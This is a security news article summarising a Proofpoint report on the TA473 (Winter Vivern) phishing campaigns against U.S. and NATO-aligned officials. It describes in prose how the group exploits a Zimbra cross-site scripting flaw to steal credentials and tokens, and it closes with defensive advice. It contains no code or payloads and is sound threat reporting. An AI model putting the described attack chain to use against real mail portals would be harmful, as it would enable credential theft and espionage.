Phishing From TA473 Targets U.S., NATO Officials | TechRepublic
Security
SHARE
Facebook X Pinterest WhatsApp

Phishing from threat actor TA473 targets US and NATO officials

These phishing campaigns are exploiting a Zimbra vulnerability and affecting internet-facing webmail services. Learn how to protect your organization from this security threat.

Written By
Cedric Pernet
Cedric Pernet
Apr 7, 2023
A hook on a keyboard representing phishing.
Image: ronstik/Adobe Stock

A new Proofpoint report indicates that in late 2022, threat actor TA473 targeted elected officials and staffers in the U.S., as well as experts in European politics and economics. Proofpoint also states that “social engineering lures and impersonated organizations often pertain to Ukraine in the context of armed conflict” and notes that the email mailboxes of NATO-aligned government entities were targeted in Europe.

SEE: Security risk assessment checklist (TechRepublic Premium)

In older phishing campaigns from TA473, targets included Polish government agencies, Ukraine’s and Italy’s Ministries of Foreign Affairs, and individuals within the Indian government.

Jump to:

Who is TA473?

TA473 is a threat actor, known since 2021, that has targeted several countries aligned against the interests of Belarus and Russia; the group is also known as Winter Vivern for some security companies and governmental entities.

Must-read security coverage

Although there is no confirmed evidence, a few elements support the theory that the threat actor originates from Russia. For instance, a Russian word used in malware samples and documents has leaked. Beyond this leak, TA473’s frequent alignment with Russian interests makes it believable that the threat actor would originate from that country.

The threat actor mostly creates phishing campaigns to deliver payloads and harvest credentials. Payloads often target vulnerabilities in internet-facing webmail services and allow attackers to get access to email mailboxes.

Rather than developing tools to automate parts of its attacks, the group invests time and resources to compromise specific entities with custom payloads for the targeted webmail portal.

Advertisement

How TA473’s phishing campaigns work

TA473 often sends emails from compromised email addresses, originating from unpatched or insecure WordPress-hosted domains. The emails contain benign URLs from the targeted organization or a relevant peer organization, while the sender email is spoofed to look as if it comes from the organization. Then, they hyperlink this benign URL to either deliver a first-stage payload or redirect victims to a credential-harvesting landing page with actor-controlled or compromised infrastructure (Figure A).

Figure A

A screenshot of a spoofed sender sending a hyperlinked URL to a user via email.
Sample TA473 phishing email. Image: Proofpoint

In some cases, TA473 uses structured URI paths that indicate a hashed value for the targeted individual, an unencoded indication of the targeted organization, and encoded or plaintext versions of the benign URL that was hyperlinked in the initial email to targets.

How TA473 exploits a Zimbra vulnerability

In early 2023, the threat actor started exploiting a known vulnerability in Zimbra Collaboration versions 9.0.0 that was often used to host internet-accessible webmail portals. To successfully achieve that exploitation, the malicious link in the phishing email sends a hexadecimal-encoded JavaScript snippet to the Zimbra software, which is executed as an error parameter (Figure B).

Figure B

A sample of the URL format that TA473 hackers use.
Sample URL format as used by TA473 to exploit CVE-2022-27926. Image: Proofpoint

Once the JavaScript snippet is decoded, it downloads the next stage payload that triggers cross-site request forgery to steal usernames, passwords and CSRF tokens from the user who clicked the malicious link (Figure C).

Figure C

A diagram that illustrates the TA473 infection scheme step by step.
TA473 infection scheme. Image: Proofpoint

The JavaScript used by TA473 attackers also attempts to log in to the legitimate email portal with active tokens.

Proofpoint has observed that the threat actor sometimes targets specific RoundCube webmail request tokens as well, which reveals that the threat actor has already done reconnaissance on the target prior to attacking it.

Advertisement

How to protect from this security threat

  1. Patch Zimbra Collaboration, which will prevent attackers from exploiting the CVE-2022-27926 vulnerability.
  2. Ensure multifactor authentication is enabled on internet-facing services such as web portals; even if an attacker owns valid credentials, they might not be able to use them. Strong password policies also need to be enforced.
  3. Put network policies in place so that, even though the webmail portal faces the internet, it should only be accessible from a corporate VPN connection.
  4. Educate users about phishing threats and social engineering tricks that attackers might employ.
  5. Keep operating systems and software updated and patched.

Disclosure: I work for Trend Micro, but the views expressed in this article are mine.

Cedric Pernet

Cedric Pernet is a senior threat expert with a strong focus on cybercrime and cyberespionage. He currently works at Trend Micro. Prior to that position, he worked for several Computer Emergency Response Teams (CERTs) where he did threat intelligence investigations, incident response, and computer forensics. He was also a Law Enforcement Officer working on Cybercrime in France. He is the author of a paperbook in French language on cyberespionage and an influential person in the cybersecurity community.